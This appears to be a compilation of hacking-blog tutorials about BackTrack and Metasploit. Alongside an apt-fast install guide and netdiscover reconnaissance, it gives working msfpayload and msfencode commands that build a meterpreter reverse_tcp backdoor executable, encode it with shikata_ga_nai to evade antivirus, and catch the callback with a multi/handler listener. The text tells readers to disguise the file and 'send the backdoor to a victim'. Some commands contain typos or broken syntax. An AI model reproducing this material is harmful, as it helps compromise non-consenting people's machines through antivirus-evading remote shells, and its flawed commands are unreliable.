IDM FOR BACKTRACK

INSTALL IDM IN BACKTRACK

Everyone relies on the famous "apt-get" command to install  packages, or update their systems. Unfortunately "apt" only uses one single connection which makes the process quite slow.This is why many Linux users were looking for an alternative for Internet download manager or trying to run it with wine in vain.
The solution comes with a wonderful utility, which is in fact a script named "fast". This utility can be considered as the Linux IDM version. It allows multiple connections simultaneously and can boost your downloading speed to the max.

-First you need to download the script (clean) from here: 
http://www.mattparnell.com/linux/apt-fast/apt-fast.sh

-Uncompress the file with this command to make it executable:

root@bt:~# chmod +x apt-fast.sh

-Move it now to the user bin directory:



root@bt:~# mv apt-fast.sh /usr/bin/apt-fast.sh

Now, all what is left is to run "fast" instead of "get", for example:

root@bt:~# apt-fast.sh update

root@bt:~# apt-fast install chromium-browser

Introduction to Metasploit

Metasploit - Overview

What is metasploit?

Metasploit as described by its developers is :"A collaboration between the open source community and Rapid7, Metasploit software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments, providing true security risk intelligence. Capabilities include smart exploitation, password auditing, web application scanning, and social engineering. Teams can collaborate in Metasploit and present their findings in consolidated reports.

Metasploit editions range from a free edition to professional enterprise editions, all based on the Metasploit Framework, an open source software development kit with the world's largest, public collection of quality-assured exploits." http://www.metasploit.com/about/what-is-it/

There are many Metasploit editions: metasploit community, metasploit express, metasploit pro & metasploit framework. There are also different interfaces for this tool: msfconsole:

msfcli:

 and msf gui which is the graphiical interface:

You have to know also that there is no perfect interface for metasploit, each one has its pros & cons.

Architecture:

Terminology:

1. Exploits: exploits are security flaw that allow a pentester to  attack targets.

2. Payloads: Allow attacker to generate shellcodes, executable files, and simply  specify the work of the payload.

3. Auxiliaries: integrated applications like sniffers, keyloggers ..

4. Meterpreter: An injected payload into a system process.

5. Encoders: Used to allow the modification of original exploit codes so that to shun antivirus detection software.

Basic commands:

1. Help: Displays all the metasploit commands:

2. Search: You can use if you are  not sure about the exact name of a certain exploit. If you want to look for an "smb" exploit for example you type: search smb:

3. use: Used to select a particular exploit:

4. info: Used to provide information about the selected exploit:

5. show options: Used to show all options of a given exploit:

6. show: Used to display all the available payloads, encoders, and nops arelated to a given exploit:

7. set: Used to configure a given exploit:

Chennai Hackers Connect  hopes that this article was useful to you.

FUD BACKDOOR WITH MFENCODE

ENCRYPTING PAYLOAD USING MSF-ENCODE

 We have seen how to create a simple backdoor.exe for exploiting windows machines simple backdoor. However that simple backdoor is easily caught by any antivirus program, you can't rely after all on a stupid victim who is not running an antivirus program on his machine, because you know that it is very rare. 
Well, metasploit has the necessary tools for crypting your backdoor to avoid detection. Let's see first our chances to bypass an antivirus program without encryption:

As you can see, we have a little chance to have a successful exploitation of a remote victim.

Let's see what available options does metasploit offer to us:

root@ddr:~# msfencode -h

Let's see what available encoders do we have: 

root@ddr:~# msfenode -l

As you may notice, the "shikata_ga_nai" is referred to as the best encoder in "msfencode",we are going to use it to encode our backdoor.

Let's create our backdoor:

root@ddr:~# msfpayload windows/meterpreter_reverse_tcp LHOST=192.168.1.101 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw -a x86 -b '\x00\x0a\x0d' -c 5  -x /root/Desktop/pw.exe -o /root/Desktop/pwn.exe

With the above command, we enoded our backdoor 5 times with the "shikata_ga_nai" encoder and we exluded any recurrence of this code from our backdoor signature (\x00\x0a\x0d), then we exported the generated exe file to our desktop. check with online virus scanners.

reconnaissance using Netdiscover

Netdiscover scanning

"Netdiscover" is an active/passive address reconnaissance tool, mainly developed for those wireless networks without dhcp server, when you are wardriving. It can be also used on hub/switched networks.

Built on top of libnet and libpcap, it can passively detect online hosts, or search for them, by actively sending arp requests, it can also be used to inspect your network arp traffic, or find network addresses using auto scan mode, which will scan for common local networks." source: netdiscover

Here are the different available options of this tool:

In this example, i am going to use "netdiscover" to search for available hosts on my wireless interface:
root@ddr:~# netdiscover -i [interface]

You can input the interface of your choice, if you are cable connected for example, your internet interface should be eth0. To see what available network interfaces you have, opên a terminal and type: ifconfig

Metasploit Backdoor

Creating simple Metasploit Backdoor

In this scenario, we are going to create a simple backdoor which is an infected executable file to be run on a windows system. You need to provide your IP address which can be obtained by the command "ifconfig" together with the port you want your  backdoor to connect to. The custom port for this connection is usually 443 or 4444, but you can choose any other port.


issue the following command:

root@ddr:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.15 LPORT=4444 > root/Desktop > backdoor.exe

So, as you can see from this example, a backdoor.exe has been created in the "Home" folder. In the above example just change the ip address with yours,, and name it to whatever you like, you don't like after all to tell your victim that this is a backdoor !! :-)

Now, we have finished with the first part, but what is next? 
We simply need a listener which will handle the connection back to our exploit machine.

First of all, we need to open metasploit console:

root@ddr:~#msfconsole

Now ,we need to use multihandler for a reverse connection:


msf >  use exploit/multi/handler

Now , we set up our payload:


msf >  set payload windows/meterpreter/reverse_tcp

Now, we have to set up the lhost & lport:

msf >  set lhost 192.168.1.15

msf >  set lport 4444

Last phase now, is to type "exploit" 


msf > exploit

We are ready for exploiting the remote machine. Send the backdoor to a victim and wait for a connection ;-)